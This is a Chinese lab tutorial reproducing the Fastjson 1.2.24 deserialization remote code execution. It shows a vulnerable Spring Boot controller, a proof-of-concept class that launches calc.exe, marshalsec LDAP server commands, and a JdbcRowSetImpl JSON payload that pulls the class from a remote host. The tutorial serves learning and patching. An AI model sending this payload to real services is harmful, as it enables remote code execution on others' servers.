Fastjson最经典的反序列漏洞是在1.2.24版本时,当时可以利用的主流方式有两种。
1.JNDI注入利用com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl中的_bytecodes属性进行整个恶意类的反序列化。
2.利用rmi或者ldap让服务器远程调用恶意类进行利用。
第一种方式fastjosn默认不会反序列私有属性,需要在反序列化时设置Feature.SupportNonPublicField这种方式才可以利用成功。
由于第一种方式受限制较多,很多情况下不会设置Feature.SupportNonPublicField,所以我们直接模拟下第二种方式。
Python 2.7
Java jdk 1.8.0_101
marshalsec-0.0.3-SNAPSHOT-all.jar (https://github.com/mbechler/marshalsec) 模拟rmi或者ldap服务
springboot简单的代码准备
一个超级简单的springboo服务,使用官方生成一个demo即可 https://start.spring.io/
加入fastjson的jar包,版本可以换,我特地用了一个比较低的版本
<dependency>
<groupId>com.alibaba</groupId>
<artifactId>fastjson</artifactId>
<version>1.2.20</version>
</dependency>
加入一个简单的Controller
@RequestMapping("/hello")
public String say(@RequestBody String username) {
System.out.println(username);
Object Nuset=JSON.parseObject(username);
return "hello,this is a springboot demo!~";
}
相当简单代码,接收参数,然后使用FastJson的parseObject去解析.到这里一个简单的模拟服务端完成.直接springboot启动即可.我实在本地启动,我是一台windows的开发机.
这里我用我的腾讯云主机作为rmi或ldap服务的发布方.
首先下载marshalsec-0.0.3-SNAPSHOT-all.jar (https://github.com/mbechler/marshalsec) 模拟rmi或者ldap服务,这是一个java的 maven项目 下载后 直接install 得到 jar包,上传到腾讯云主机服务器.
攻击代码准备
import java.lang.Runtime;
import java.lang.Process;
public class FastjsonPOC {
static {
try {
//因为模拟服务在本地的windows主机启动,所以,执行打开计算器的操作,模拟攻击者要做的事情
Process process = Runtime.getRuntime().exec("calc.exe");
process.waitFor();
} catch (Exception e) {
}
}
}
将此代码本地编译后得到class文件,既FastjsonPOC.class,上传到上传到腾讯云主机服务器.
防火墙放开9090和9091端口
自带的python开始9090的http端口
python -m SimpleHTTPServer 9090
执行以下命令(jdk我就默认你有了哈!)开启rmi服务
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://xx.xx.xxx.xxx:9090/#FastjsonPOC 9091
好了,万事俱备了......
用PostMan或其他http模拟工具,朝模拟服务端的接口发送以下报文:
{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
??},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"ldap://xx.xx.xxx.xxx:9091/FastjsonPOC",
"autoCommit":true
??}
}
可以看到计算器被打开了.............
凶残!!!!!!!!!!!!!,以前写代码时,没注意这些漏洞提示,现在真实的体验到了,就两个字,凶残.......漏洞修复要及时才行啊!
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。